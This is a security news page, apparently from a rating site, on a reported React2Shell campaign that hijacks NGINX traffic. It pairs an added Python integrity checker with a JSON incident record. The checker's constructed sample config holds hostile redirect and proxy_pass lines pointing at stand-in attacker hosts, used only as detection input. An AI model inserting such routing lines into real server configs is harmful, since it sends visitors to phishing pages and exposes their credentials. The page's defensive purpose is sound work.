Threat Actors Exploit React2Shell Vulnerability to Hijack NGINX Web Traffic
Researchers at Datadog Security Labs have uncovered a multi-stage, automated campaign in which threat actors exploit the React2Shell vulnerability to compromise NGINX web servers and redirect their traffic for malicious purposes. The attacks primarily target organizations in Asia, particularly those with domains ending in .in, .id, .pe, .bd, .edu, .gov, and .th, as well as Chinese hosting infrastructure, often running Boato Panel for server management.
Once inside a network, attackers deploy toolkits containing scripts for target discovery, persistence, and malicious configuration file creation. These files manipulate NGINX’s routing rules to hijack web traffic, enabling activities such as:
- Fingerprinting organizational traffic
- Injecting malware into users’ devices
- Redirecting visitors to phishing pages to steal credentials
The shift toward NGINX exploitation reflects a broader trend: as defenses like MFA and password managers strengthen, attackers are reverting to infrastructure-level attacks such as session cookie theft to bypass modern security controls. Notably, two IP addresses now account for 56% of observed exploitation attempts, a sharp consolidation from over 1,000 unique sources earlier.
Defensive measures highlighted by researchers include:
- Monitoring NGINX configuration file integrity to detect unauthorized changes
- Applying the latest security patches, particularly for React and NGINX
- Locking down configuration files to prevent tampering
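As an added example (not code from the Datadog report or from this page), the following Python check implements the first and third measures in one pass: it records a SHA-256 baseline of an NGINX config, reports any drift, and lists routing directives (`return 30x`, `rewrite ... redirect`, `proxy_pass`) whose target host is outside an allow-list, which is the pattern a hijacked config introduces. The config snippets, hosts and allow-list are constructed for the example.

```python
from __future__ import annotations
import hashlib
import re

# Constructed sample configs (not taken from the report): a clean baseline and a
# tampered copy with a redirect and a proxy_pass to an attacker-controlled host.
BASELINE_CONF = """server {
    listen 80;
    server_name www.example.org;
    root /var/www/html;
    location / { try_files $uri $uri/ =404; }
    location /app/ { proxy_pass http://127.0.0.1:3000/; }
}
"""
TAMPERED_CONF = BASELINE_CONF[:-2] + (
    "    location /login { return 302 http://203.0.113.10/l/; }\n"
    "    location /api/ { proxy_pass http://evil-cdn.invalid/; }\n}\n"
)

# Directives a hijacked config adds to reroute visitors: HTTP 30x returns,
# rewrite ... redirect|permanent, and proxy_pass. Bare upstream names carry
# no host and are therefore not flagged by this check.
ROUTING_RE = re.compile(
    r"((?:return\s+30[1278]\s+[^;\s]+"
    r"|rewrite\s+[^;]*?\s(?:redirect|permanent)"
    r"|proxy_pass\s+[^;\s]+)\s*;)"
)
HOST_RE = re.compile(r"https?://([^/;\s:]+)")  # hostname or IP, port dropped


def config_hash(text: str) -> str:
    """SHA-256 of a config file's contents; store it as the integrity baseline."""
    return hashlib.sha256(text.encode()).hexdigest()


def integrity_changed(baseline_hash: str, current_text: str) -> bool:
    """True when the live file no longer matches the recorded baseline."""
    return config_hash(current_text) != baseline_hash


def suspicious_directives(text: str, allowed_hosts: set[str]) -> list[str]:
    """Routing directives whose target host is outside the allow-list."""
    hits = []
    for m in ROUTING_RE.finditer(text):
        directive = m.group(1)
        if any(h not in allowed_hosts for h in HOST_RE.findall(directive)):
            hits.append(directive)
    return hits


if __name__ == "__main__":
    baseline = config_hash(BASELINE_CONF)
    print("drift detected:", integrity_changed(baseline, TAMPERED_CONF))
    for d in suspicious_directives(TAMPERED_CONF, {"127.0.0.1"}):
        print("suspicious routing directive:", d)
```

In production the baseline hashes would be written at deploy time and compared on a schedule or via an inotify watcher, with the drift and directive hits forwarded to the SIEM.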
The attacks underscore the risks of unpatched vulnerabilities and poorly secured web infrastructure, with compromised sites facing reputational damage if flagged for hosting malware. The use of AI-driven exploitation tools further lowers the barrier for attackers, making server-side vulnerabilities a fast and cost-effective target.
boatoon GmbH cybersecurity rating report: https://www.rankiteo.com/company/boatoon-gmbh
NGINX cybersecurity rating report: https://www.rankiteo.com/company/nginx
{
  "id": "BOANGI1770244421",
  "linkid": "boatoon-gmbh, nginx",
  "type": "Vulnerability",
  "date": "1/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks",
  "affected_entities": [
    {
      "location": "Asia (domains ending in .in, .id, .pe, .bd, .edu, .gov, .th), Chinese hosting infrastructure",
      "type": "Organizations"
    }
  ],
  "attack_vector": "Exploitation of React2Shell vulnerability",
  "data_breach": {
    "personally_identifiable_information": "Yes",
    "sensitivity_of_data": "High (personally identifiable information)",
    "type_of_data_compromised": "Credentials (via phishing)"
  },
  "description": "Researchers at Datadog Security Labs have uncovered a multi-stage, automated campaign where threat actors exploit the React2Shell vulnerability to compromise NGINX web servers, redirecting traffic for malicious purposes. The attacks primarily target organizations in Asia, particularly those with domains ending in .in, .id, .pe, .bd, .edu, .gov, and .th, as well as Chinese hosting infrastructure, often running Boato Panel for server management. Attackers deploy toolkits containing scripts for target discovery, persistence, and malicious configuration file creation to manipulate NGINX’s routing rules, enabling activities such as fingerprinting organizational traffic, injecting malware, and redirecting visitors to phishing pages to steal credentials.",
  "impact": {
    "brand_reputation_impact": "Reputational damage if flagged for hosting malware",
    "identity_theft_risk": "High (credential theft via phishing)",
    "operational_impact": "Traffic hijacking, malware injection, phishing redirection",
    "systems_affected": "NGINX web servers"
  },
  "initial_access_broker": {"entry_point": "React2Shell vulnerability"},
  "lessons_learned": "The incident underscores the risks of unpatched vulnerabilities and poorly secured web infrastructure. Attackers are increasingly targeting server-side vulnerabilities to bypass modern security controls like MFA and password managers.",
  "motivation": ["Credential theft", "Malware distribution", "Traffic redirection"],
  "post_incident_analysis": {
    "corrective_actions": [
      "Patch management",
      "Configuration file integrity monitoring",
      "Access control for NGINX configurations"
    ],
    "root_causes": [
      "Unpatched React2Shell vulnerability",
      "Poorly secured NGINX configuration files"
    ]
  },
  "recommendations": [
    "Monitor NGINX configuration file integrity to detect unauthorized changes",
    "Apply the latest security patches, particularly for React and NGINX",
    "Lock down configuration files to prevent tampering",
    "Implement enhanced monitoring for infrastructure-level attacks"
  ],
  "references": [{"source": "Datadog Security Labs"}],
  "response": {
    "remediation_measures": [
      "Monitoring NGINX configuration file integrity",
      "Applying the latest security patches for React and NGINX",
      "Locking down configuration files to prevent tampering"
    ],
    "third_party_assistance": "Datadog Security Labs"
  },
  "title": "Threat Actors Exploit React2Shell Vulnerability to Hijack NGINX Web Traffic",
  "type": "Web Traffic Hijacking",
  "vulnerability_exploited": "React2Shell"
}